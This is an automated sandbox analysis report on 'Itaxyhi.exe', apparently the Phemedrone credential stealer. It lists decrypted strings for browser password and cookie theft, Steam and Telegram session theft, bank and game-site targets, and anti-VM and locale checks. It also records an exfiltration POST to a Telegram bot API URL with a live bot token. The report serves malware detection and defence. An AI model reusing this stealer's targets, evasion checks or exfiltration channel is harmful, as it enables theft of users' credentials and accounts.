            Source: Itaxyhi.exeString decryptor: \.
            Source: Itaxyhi.exeString decryptor: Unknown
            Source: Itaxyhi.exeString decryptor: (
            Source: Itaxyhi.exeString decryptor: )
            Source: Itaxyhi.exeString decryptor: Passwords Tags:
            Source: Itaxyhi.exeString decryptor: Cookies Tags:
            Source: Itaxyhi.exeString decryptor: ]
            Source: Itaxyhi.exeString decryptor: -Phemedrone-Report.zip
            Source: Itaxyhi.exeString decryptor: x
            Source: Itaxyhi.exeString decryptor: https://get.geojs.io/v1/ip/geo.json
            Source: Itaxyhi.exeString decryptor: root\SecurityCenter2
            Source: Itaxyhi.exeString decryptor: SELECT * FROM AntivirusProduct
            Source: Itaxyhi.exeString decryptor: displayName
            Source: Itaxyhi.exeString decryptor: X2
            Source: Itaxyhi.exeString decryptor: :
            Source: Itaxyhi.exeString decryptor: SELECT * FROM Win32_VideoController
            Source: Itaxyhi.exeString decryptor: Name
            Source: Itaxyhi.exeString decryptor: SELECT * FROM Win32_Processor
            Source: Itaxyhi.exeString decryptor: SELECT * FROM Win32_ComputerSystem
            Source: Itaxyhi.exeString decryptor: TotalPhysicalMemory
            Source: Itaxyhi.exeString decryptor: 0
            Source: Itaxyhi.exeString decryptor: Win32_Processor
            Source: Itaxyhi.exeString decryptor: ProcessorId
            Source: Itaxyhi.exeString decryptor: Win32_DiskDrive
            Source: Itaxyhi.exeString decryptor: SerialNumber
            Source: Itaxyhi.exeString decryptor: SELECT * FROM
            Source: Itaxyhi.exeString decryptor: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
            Source: Itaxyhi.exeString decryptor: ProductName
            Source: Itaxyhi.exeString decryptor: user32.dll
            Source: Itaxyhi.exeString decryptor: GetDC
            Source: Itaxyhi.exeString decryptor: gdi32.dll
            Source: Itaxyhi.exeString decryptor: GetDeviceCaps
            Source: Itaxyhi.exeString decryptor: Screenshot.png
            Source: Itaxyhi.exeString decryptor: *ssfn*
            Source: Itaxyhi.exeString decryptor: \config
            Source: Itaxyhi.exeString decryptor: *.vdf
            Source: Itaxyhi.exeString decryptor: Steam/
            Source: Itaxyhi.exeString decryptor: HKEY_CURRENT_USER\Software\Valve\Steam
            Source: Itaxyhi.exeString decryptor: SteamPath
            Source: Itaxyhi.exeString decryptor: HKEY_CLASSES_ROOT\tg\DefaultIcon
            Source: Itaxyhi.exeString decryptor: tdata
            Source: Itaxyhi.exeString decryptor: s
            Source: Itaxyhi.exeString decryptor: Messengers/Telegram/
            Source: Itaxyhi.exeString decryptor: file
            Source: Itaxyhi.exeString decryptor: filename
            Source: Itaxyhi.exeString decryptor: filedescription
            Source: Itaxyhi.exeString decryptor: POST
            Source: Itaxyhi.exeString decryptor: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
            Source: Itaxyhi.exeString decryptor: ----------------------------
            Source: Itaxyhi.exeString decryptor: multipart/form-data; boundary=
            Source: Itaxyhi.exeString decryptor: --
            Source: Itaxyhi.exeString decryptor: Content-Disposition: form-data; name="
            Source: Itaxyhi.exeString decryptor: "; filename="
            Source: Itaxyhi.exeString decryptor: "
            Source: Itaxyhi.exeString decryptor: Content-Type: application/octet-stream
            Source: Itaxyhi.exeString decryptor: .phem
            Source: Itaxyhi.exeString decryptor: https://api.telegram.org/bot{0}/sendDocument
            Source: Itaxyhi.exeString decryptor: document
            Source: Itaxyhi.exeString decryptor: chat_id
            Source: Itaxyhi.exeString decryptor: parse_mode
            Source: Itaxyhi.exeString decryptor: MarkdownV2
            Source: Itaxyhi.exeString decryptor: caption
            Source: Itaxyhi.exeString decryptor: wireshark
            Source: Itaxyhi.exeString decryptor: httpdebbugerui
            Source: Itaxyhi.exeString decryptor: mtmproxy
            Source: Itaxyhi.exeString decryptor: sniffer
            Source: Itaxyhi.exeString decryptor: VirtualBox
            Source: Itaxyhi.exeString decryptor: VBox
            Source: Itaxyhi.exeString decryptor: VMware Virtual
            Source: Itaxyhi.exeString decryptor: VMware
            Source: Itaxyhi.exeString decryptor: Hyper-V Video
            Source: Itaxyhi.exeString decryptor: ru-RU
            Source: Itaxyhi.exeString decryptor: kk-KZ
            Source: Itaxyhi.exeString decryptor: ro-MD
            Source: Itaxyhi.exeString decryptor: uz-UZ
            Source: Itaxyhi.exeString decryptor: be-BY
            Source: Itaxyhi.exeString decryptor: az-Latn-AZ
            Source: Itaxyhi.exeString decryptor: hy-AM
            Source: Itaxyhi.exeString decryptor: ky-KG
            Source: Itaxyhi.exeString decryptor: tg-Cyrl-TJ
            Source: Itaxyhi.exeString decryptor:
            Source: Itaxyhi.exeString decryptor: Account ID:
            Source: Itaxyhi.exeString decryptor: Token:
            Source: Itaxyhi.exeString decryptor: Browser:
            Source: Itaxyhi.exeString decryptor: Name:
            Source: Itaxyhi.exeString decryptor: Value:
            Source: Itaxyhi.exeString decryptor: URL:
            Source: Itaxyhi.exeString decryptor: Username:
            Source: Itaxyhi.exeString decryptor: Password:
            Source: Itaxyhi.exeString decryptor: v
            Source: Itaxyhi.exeString decryptor: (
            Source: Itaxyhi.exeString decryptor: Number: {0}Placeholder: {1}Expiration: {2}/{3}Browser: {4} v{5} ({6})
            Source: Itaxyhi.exeString decryptor: UNKNOWN
            Source: Itaxyhi.exeString decryptor: *.ldb
            Source: Itaxyhi.exeString decryptor: encrypted_key
            Source: Itaxyhi.exeString decryptor: DPAPI
            Source: Itaxyhi.exeString decryptor: roblox.com
            Source: Itaxyhi.exeString decryptor: ROBLOX
            Source: Itaxyhi.exeString decryptor: steampowered.com
            Source: Itaxyhi.exeString decryptor: GAMES
            Source: Itaxyhi.exeString decryptor: genshin
            Source: Itaxyhi.exeString decryptor: epicgames.com
            Source: Itaxyhi.exeString decryptor: qiwi
            Source: Itaxyhi.exeString decryptor: BANK
            Source: Itaxyhi.exeString decryptor: tinkoff
            Source: Itaxyhi.exeString decryptor: yoomoney
            Source: Itaxyhi.exeString decryptor: sberbank
            Source: Itaxyhi.exeString decryptor: funpay
            Source: Itaxyhi.exeString decryptor: MONEY
            Source: Itaxyhi.exeString decryptor: paypal
            Source: Itaxyhi.exeString decryptor: americanexpress
            Source: Itaxyhi.exeString decryptor: amazon
            Source: Itaxyhi.exeString decryptor: spotify
            Source: Itaxyhi.exeString decryptor: MUSIC
            Source: Itaxyhi.exeString decryptor: music.apple
            Source: Itaxyhi.exeString decryptor: celka.
            Source: Itaxyhi.exeString decryptor: CHEATS
            Source: Itaxyhi.exeString decryptor: nursultan.
            Source: Itaxyhi.exeString decryptor: xone
            Source: Itaxyhi.exeString decryptor: akrien
            Source: Itaxyhi.exeString decryptor: interium
            Source: Itaxyhi.exeString decryptor: nixware
            Source: Itaxyhi.exeString decryptor: expensive.
            Source: Itaxyhi.exeString decryptor: gamesense
            Source: Itaxyhi.exeString decryptor: neverlose
            Source: Itaxyhi.exeString decryptor: youtube
            Source: Itaxyhi.exeString decryptor: YOUTUBE
            Source: Itaxyhi.exeString decryptor: minecraft.net
            Source: Itaxyhi.exeString decryptor: dQw4w9WgXcQ:[^"]*
            Source: Itaxyhi.exeString decryptor: dQw4w9WgXcQ:
            Source: Itaxyhi.exeString decryptor: "\s*:\s*([^,}]+)
            Source: Itaxyhi.exeString decryptor: SELECT * FROM Win32_Process WHERE ProcessId = {0}
            Source: Itaxyhi.exeString decryptor: root\CIMV2
            Source: Itaxyhi.exeString decryptor: ParentProcessId
            Source: Itaxyhi.exeString decryptor: \Device\LanmanRedirector\
            Source: Itaxyhi.exeString decryptor: Mozilla/5.0 (
            Source: Itaxyhi.exeString decryptor: ) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: Itaxyhi.exeString decryptor: Chrome/{0}.0.{1}.{2} Safari/537.36
            Source: Itaxyhi.exeString decryptor: Windows NT
            Source: Itaxyhi.exeString decryptor: 10.0
            Source: Itaxyhi.exeString decryptor: 6.1
            Source: Itaxyhi.exeString decryptor: 6.3
            Source: Itaxyhi.exeString decryptor: 6.2
            Source: Itaxyhi.exeString decryptor: ; Win64; x64
            Source: Itaxyhi.exeString decryptor: ; WOW64
            Source: Itaxyhi.exeString decryptor: UNIQUE
            Source: Itaxyhi.exeString decryptor: Writing is not allowed
            Source: Itaxyhi.exeString decryptor: v1
            Source: Itaxyhi.exeString decryptor: bcrypt.dll
            Source: Itaxyhi.exeString decryptor: BCryptDecrypt
            Source: Itaxyhi.exeString decryptor: BCryptDestroyKey
            Source: C:\Users\user\Desktop\Itaxyhi.exeCode function: 0_2_00007FFD3489BF3D CryptUnprotectData,0_2_00007FFD3489BF3D
            Source: unknownHTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.6:49699 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49700 version: TLS 1.2
            Source: Itaxyhi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 172.67.70.233 172.67.70.233
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: POST /bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dd19839ab01d6dHost: api.telegram.orgContent-Length: 697295Expect: 100-continueConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.6:49699 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: get.geojs.io
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dd19839ab01d6dHost: api.telegram.orgContent-Length: 697295Expect: 100-continueConnection: Keep-Alive
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://get.geojs.io
            Source: Itaxyhi.exe, 00000000.00000002.2152316151.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.ad0/g/im
            Source: Itaxyhi.exe, 00000000.00000002.2152316151.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobt/pg/
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendDocument
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendDocument(United
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.ge
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geojs.io
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geojs.io/v1/ip/geo.json
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/TheDyer
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/webster480
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49700 version: TLS 1.2
            Source: C:\Users\user\Desktop\Itaxyhi.exeCode function: 0_2_00007FFD34896C780_2_00007FFD34896C78
            Source: C:\Users\user\Desktop\Itaxyhi.exeCode function: 0_2_00007FFD348A90820_2_00007FFD348A9082
            Source: C:\Users\user\Desktop\Itaxyhi.exeCode function: 0_2_00007FFD348AC4DB0_2_00007FFD348AC4DB
            Source: C:\Users\user\Desktop\Itaxyhi.exeCode function: 0_2_00007FFD348A82D60_2_00007FFD348A82D6
            Source: C:\Users\user\Desktop\Itaxyhi.exeCode function: 0_2_00007FFD348932500_2_00007FFD34893250
            Source: C:\Users\user\Desktop\Itaxyhi.exeCode function: 0_2_00007FFD348922800_2_00007FFD34892280
            Source: C:\Users\user\Desktop\Itaxyhi.exeCode function: 0_2_00007FFD348A0EC80_2_00007FFD348A0EC8
            Source: C:\Users\user\Desktop\Itaxyhi.exeCode function: 0_2_00007FFD34892FF20_2_00007FFD34892FF2
            Source: C:\Users\user\Desktop\Itaxyhi.exeCode function: 0_2_00007FFD348993E20_2_00007FFD348993E2
            Source: C:\Users\user\Desktop\Itaxyhi.exeCode function: 0_2_00007FFD348994380_2_00007FFD34899438
            Source: Itaxyhi.exe, 00000000.00000000.2088314539.0000000000830000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesystem.exeH vs Itaxyhi.exe
            Source: Itaxyhi.exeBinary or memory string: OriginalFilenamesystem.exeH vs Itaxyhi.exe
            Source: Itaxyhi.exe, Ekobadyrito.csBase64 encoded string: 'WFdwFR5aADJTWzoGDBxHSUZZAlNOHi4tYnQ9Q1hfGxEUV3YADV0KTBY='
            Source: Itaxyhi.exe, Isocyxorura.csBase64 encoded string: 'IjJ9IC1iRU8WfyMgNRMlEx9EAzo+RAoGU0oCTy97Nyg0V2EXAVUAFkVwFU9FEwlKDA=='
            Source: Itaxyhi.exe, Elimetuvyky.csBase64 encoded string: 'PwJcBwtEX0VNCQxicmMeGxISWQoCUgAXDBkKXgU+eD8JB1gXD0IMClgDURRKTl0BQgo8byxEChJFXANVWEhGB1EBSlATFk0eAERY'
            Source: Itaxyhi.exe, Lularetages.csBase64 encoded string: 'TUhJCAIWEwBEShgAFg5QS19HE0VRCGhvCmsiLihSABscEkUAHEVFHVtVHxxCSwETTFVZERpGX0oZTgYYVkRBVB4FVkpcBlVUGWE8IytQGh8cFhwMAEURBFhaFE1YSx8WHwQLHR1SWEdeTQUfQhxdDQYAHxJdGAoXURZDX0gCXSI8O2IGBlMIBBQHfGVYE04/CQdeCwtYEVt3aDAtRBw3AgEYXwAAQltoPBlRUzVcFg8dAkJbAlUdHG5UBVceVxAQGU4DThtdSlV6SjMaHFwbLgI+XTVYexcSZA0eBRABAxkeFWBOGlQcL2JpFyRPRhw5ORt5Nj5nFQRwdDIqOXtKFh01Ay4qeAEJBmAfBA8DQhgwElZcWw9TBwNcPggBXSQfAAQIKF1HKg91eDo+MlI6CyYGHgolQS0OYFYJORkGBQgDTgAAOnIrEg5ART8sfEIINTJ1DCBUJAtySkkpTkQZR01YfAoKQwkQRQd8ZUQcICkwJ1AXD1sAEVNLAlE='
            Source: Itaxyhi.exe, Osevyhapebu.csBase64 encoded string: 'PBhLDAJaBEoDF0FPUGQbFBUYRhZOeDFFABdAVFhkPS1HQxhFL0YVCVNuFA0zWgZVR0cDS10BRU19cSUiNB9SFhgcVEUpUwYOWRBRLBBBHRcUWAVcQAZLVAILQ0FLCktaIhZXBBxfSlMGCQ=='
            Source: Itaxyhi.exe, Nesutozyvas.csBase64 encoded string: 'OTx0PDF1MDdkfD87J2YhPyMrYgoIQhIERFwtORlfBB8tJEUAD1s='
            Source: Itaxyhi.exe, Ysybakubylu.csBase64 encoded string: 'WydZAANTARdZVxRPK0cXGx0SQ0U8UxUKRE1bTyRPUhgIV3ESC1QWEVNLRVdIE1RaMSNZACpPABc7M3xlGFMSWlxXeDVUFh5VSxktRwMCDyZYejtFQxYxBFEDURRKTlIBQgo8b04bRTVXSgIYF0EWCUtXSlETO29FGxkyABdYGx8CTREeW0tobxYUUTgZXx4fBQQLRRUAGGg8WREPdTkJTQx6Ox5WS2hvOzMxCQpWExESGFUMAFEWFVlN', 'OTx0PDF6KiZ3dS4iOXA6Mz8ybTYhcDEyd2s0MzVaEQgeBF4DGmoyDFhdHhgLEzwuLTREFxxTCxFgXAMcEVwc'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/1@2/2
            Source: C:\Users\user\Desktop\Itaxyhi.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Itaxyhi.exe.logJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Itaxyhi.exeMutant created: \Sessions\1\BaseNamedObjects\Memirybesohutifojyxifyloxaledoc
            Source: Itaxyhi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Itaxyhi.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\Itaxyhi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Itaxyhi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Itaxyhi.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002DE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Itaxyhi.exeReversingLabs: Detection: 79%
            Source: Itaxyhi.exeVirustotal: Detection: 70%
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Itaxyhi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Itaxyhi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Itaxyhi.exeCode function: 0_2_00007FFD3489BAFB push 8B485DE0h; iretd 0_2_00007FFD3489BB00
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
